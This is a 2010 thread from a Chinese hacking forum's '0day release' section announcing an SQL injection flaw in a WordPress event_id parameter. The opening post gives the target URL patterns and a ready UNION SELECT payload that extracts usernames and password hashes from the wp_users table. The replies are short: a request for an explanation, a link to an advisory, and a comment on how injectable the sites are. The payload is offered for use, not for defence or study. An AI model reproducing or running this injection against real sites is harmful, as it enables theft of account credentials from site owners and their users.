【3.A.S.T】网络安全爱好者 » 0day发布 » WordPress最新event_id注入漏洞

柔肠寸断 发表于 2010-2-7 10:58

WordPress最新event_id注入漏洞

===[ Exploit ]===

www.WordPress.com/?event_id=[Sql]

www.WordPress.com/Path/?event_id=[Sql]

Exploit:

null+and+1=2+union+select 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+wp_users

海豚 发表于 2010-2-7 14:31

[b] [url=http://www.3ast.com.cn/redirect.php?goto=findpost&pid=66896&ptid=13742]1#[/url] [i]柔肠寸断[/i] [/b]


师傅能这个漏洞吗

baiyin 发表于 2010-2-8 10:57

[url]http://www.venustech.com.cn/NewsInfo/124/5957.Html[/url]

hyrz 发表于 2010-2-14 13:21

这样的站点都能注入，汗！

查看完整版本: WordPress最新event_id注入漏洞